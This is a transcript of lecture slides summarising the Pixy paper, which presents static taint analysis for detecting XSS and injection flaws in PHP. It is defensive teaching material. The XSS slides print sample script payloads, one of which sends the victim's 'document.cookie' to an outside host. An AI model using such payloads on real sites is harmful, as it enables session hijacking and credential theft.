Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities Nenad Jovanovic,...

23
From Strasbourg 2003 to Bucharest 2009 – the impact of the MS Resolution of the European Parliament Christoph Thalheim Secretary General European MS Platform

Transcript of Pixy: A Static Analysis Tool for Detecting Web Application Vulnerabilities Nenad Jovanovic,...

Pixy: A Static Analysis Tool forDetecting Web Application VulnerabilitiesNenad Jovanovic, Christopher Kruegel, Engin Kirda

Secure Systems LabVienna University of Technology

Proceedings of the IEEE Symposium on Security and Privacy. (May 2006)

2008/10/2 2

Outline

Introduction Taint-Style Vulnerabilities Data Flow Analysis Empirical Results Conclusions Comments

2008/10/2 3

Introduction(1/2)

There are urgent need for automated vulnerability detection in Web apps development.

The existing approaches for mitigating threats to Web apps can be divided into client-side and server-side solutions

Server-side solutions: Static approaches

Scan source code for vulnerabilities Dynamic approaches

Detect while executing the audited program

2008/10/2 4

Introduction(2/2)

Pixy The first open source tool for statically detecting

XSS vulnerabilities in PHP4 code by means of data flow analysis

It can be applied to other taint-style vulnerabilities such as SQL injection or command injection

http://pixybox.seclab.tuwien.ac.at/pixy/index.php

2008/10/2 5

Taint-Style Vulnerabilities(1/2) Of all vulnerabilities in Web apps, problem caused b

y unchecked input are recognized as being the most common Inject malicious data in Web applications Manipulate applications using malicious data

The authors refer to this class of vulnerabilities as the tainted object propagation problem

Referenced from “Finding security errors in Java programs with static analysis,. in Proceedings of the 14th UsenixSecurity Symposium, Aug. 2005”

2008/10/2 6

Taint-Style Vulnerabilities(2/2) Tainted data

Originate from potentially malicious users Cause security problems at vulnerable points in the program

(called sensitive sinks) May enter the program at specific places, and can spread via

assignment and similar constructs Can be untainted (sanitized) using a set of operations

Many important types of vulnerabilities (e.g., XSS or SQL injection) can be seen as instances of this general class of taint-style vulnerabilities. Differ only with respect to concrete values of few parameters

2008/10/2 7

Cross-Site Scripting (XSS)(1/2) Occurs when dynamically generated Web pages

display improperly validated input An attacker may embed malicious JavaScript code

into dynamically generated pages of trusted sites. hijack the user account credentials change user settings steal cookies insert unwanted content into the page

2008/10/2 8

Cross-Site Scripting (XSS)(2/2) Reflected Cross-Site Scripting Attacks

Stored Cross-Site Scripting Attacks An attacker's malicious script is rendered more than once

<script>alert('Hello World');</script>

<a href=“/usercp.php?action=logout”>一個關於兔子的網頁 </a>

<script>location.replace('http://rickspage.com/?secret='+document.cooki

e)</script>

2008/10/2 9

Properties of XSS

Entry Points into the programs GET: $_GET POST: $_POST COOKIE: $_COOKIE entry points grows when the “register globals” is active

Sanitation Routines htmlentities(), htmlspecialchars(), and type casts

Sensitive Sinks echo() print() printf()…

2008/10/2 10

Data Flow Analysis(1/4)

Goal: To determine whether it is possible that tainted data reaches sensitive sinks without being properly sanitized. Identify the taint value of variables used in these sinks

Statistically compute certain information for every single program point (or for coarser units such as functions)

PHP Front-End construct a parse tree for PHP input file transformed into linearized form resembling three-address code (TAC), a

nd kept as a control flow graph for each encounter function Assembly-like language At most 3 operands “x = y op z”

2008/10/2 11

Data Flow Analysis(2/4)

Operates on the control flow graph (CFG) of a program A data structure built on top of the intermediate code representati

on abstracting the control flow behavior of a function that is being

compiled Node – atomic statement of program Edge – flow of control

2008/10/2 12

Literal Analysis: Basics

Purpose: To determine, for each program point, the literal that a variable or a constant can hold.

Can improve the precision of the overall analysis by: Evaluate branch conditions Ignore program paths that cannot be executed at runtime (called

path pruning) Resolution of non-literal include statements, variable variables,

variable array indices, and variable function calls (only for potential uses)

After performing literal analysis each CFG node is associated with information about which literal

is mapped to a variable before executing that node

2008/10/2 13

How Data Flow Analysis is Used to Perform Literal Analysis Assume a fictitious

programming language One variable (v) Two literals (the integer 3

and 4)

“skip” node empty instruction

“Ω” Unknown literal

2008/10/2 14

Data Flow Analysis(3/4)

Carrier Lattice Information about program represented

using values from algebraic structure Every information that could ever be

associated with a CFG node by the analysis must be contained as an element of the used lattice

Bottom element : “not visited yet” at the biginning Line: ordering between elements regard to precision Least upper bound : the smallest element that is greater than or

equal to both of the elements. Needed by the analysis algorithm

2008/10/2 15

Data Flow Analysis(4/4)

Transfer Function f: PP for each node in control flow graph

Input: a lattice element Output: a lattice element

Models effect of the node on the program information Each CFG node is associated with such a transfer fun

ction

2008/10/2 16

Literal Analysis: Basics

Carrier Lattice Definition Provides mappings for all variables and constants

that appear in the scanned program Able to describe the mapping to any possible

literal (infinite)

2008/10/2 17

Literal Analysis: Basics

Transfer Function Definition PHP without explicit type declarations “Hidden” array

2008/10/2 18

Four cases in order of increasing complexity

1. Not an array element and not

known as array strong update

2. An array, but not an array element Array tree

3. Element without non-literal indices (may be an array) strong overlap

2008/10/2 19

Four cases in order of increasing complexity4. An array element with non-literal indices and maybe an array

weak overlap algorithm: all overwrite operations are replaced by least upper bound operations

Array elements with one or more non-literal indices are permanently mapped to Ω

2008/10/2 20

Alias Analysis

Ignoring the information of alias relationships would prevent literal analysis from producing correct results in a number of cases.

Without alias analysis, literal analysis can’t decide that $a also affects $b

$b remain unchanged and be incorrect!

2008/10/2 21

Carrier Lattice Definition Alias group: a group of variables referencing the same

memory location Modeling alias information through sets of alias group s

ets (…): an alias group {…}: an alias group set

Must-aliases of a variable “{(a,b) (c)}” $b: must-alias of $a

May-aliases of a variable “{(a,b) (c)} {(a,c) (b)}” $b and $c: may-aliases of $a

The order among lattice elements is defined as subset inclusion

2008/10/2 22

Static analysis is not able to decide which path the program will take Under the assumption that the condition is determined by dy

namic factors Environment variables, user input

2008/10/2 23

Transfer Function Definition

Reference assignment “$a = & $b”

Unset node Own one-element alias group f

or each alias group set

Global node Equally-name variable from the

global scope on the right side

“global $a;” The authors only consider references to simple variables

2008/10/2 24

Literal Analysis Revisited

Here we only consider references to simple variables Functions built into PHP are conservatively modeled as returning Ω

since the increased precision is expected to be rather small only built-in function modeled precisely is “define”

2008/10/2 25

Literal Analysis Revisited The transfer function at the call preparation node stores the alia

s information for the local variables of the calling function, and resets it to its default (initial) value

On function return (i.e., at the call return node), the alias information for local variables of the callee is reset to its default, while the caller's locals are restored again.

2008/10/2 26

Taint Analysis

Purpose: To determine, for each program point, the taint value (instead of the literal) of a variable or constant.

Possible to inspect whether any sensitive sink in the program is receiving malicious data, and hence, to detect vulnerabilities

2008/10/2 27

Taint Analysis Carrier Lattice Definition

Tainted: if it can hold a malicious, not yet sanitized (checked) value originating from user input

Not map to Ω but to the tainted values tainted and untainted mapped to tainted: this variable might be tainted. mapping to untainted: this variable is untainted. whenever the analysis cannot determine, it is conservatively a

ssumed to be tainted

2008/10/2 28

Taint Analysis Transfer Functions Definition

Implicitly casting a tainted variable into an integer untaints this variable (with unary operators such as +, -, and (int))

Correctly model built-in PHP functions can reduce the number of false positives Pixy processes a specification file on startup which contains a

bstracted versions of some built-in functions in PHP syntax “htmlentities” and “array” return $_UNTAINTED

2008/10/2 29

Taint Analysis

Using the Analysis Results Generating warnings that point the developer to p

ossible XSS vulnerabilities at the end of the analysis is straightforward. The analysis information for each sensitive sink is searc

hed for tainted input variables a A warning message indicating the corresponding line is i

ssued if such a violation is discovered

2008/10/2 30

Limitations

Pixy does not support object-oriented features of PHP. Malicious data can never arise from such construc

ts. Files included with “include” and similar keyw

ords are not scanned automatically The authors frequently observed false positives st

emming from these lacking file inclusions Eliminated through manual inclusion

2008/10/2 31

Empirical Results

2008/10/2 32

Empirical Results

2008/10/2 33

2008/10/2 34

Conclusions

A flow-sensitive, interprocedural, and context-sensitive data flow analysis for PHP, targeted at detecting taint-style vulnerabilities

Additional literal analysis and alias analysis to improve correctness and precision of taint analysis

Pixy, an open-source Java tool that implements these analysis technique

Experimental validation of Pixy’s ability to detect unknown vulnerabilities with a low false positive rate

2008/10/2 35

Comments

The first to perform alias analysis for an untyped, reference-based scripting language such as PHP

Beyond the scope of the paper Recursive calls depends on dynamic information Infinite call depth for non-terminating programs

The implementation is widely used by the public. Future work

automatic inclusion of “include” files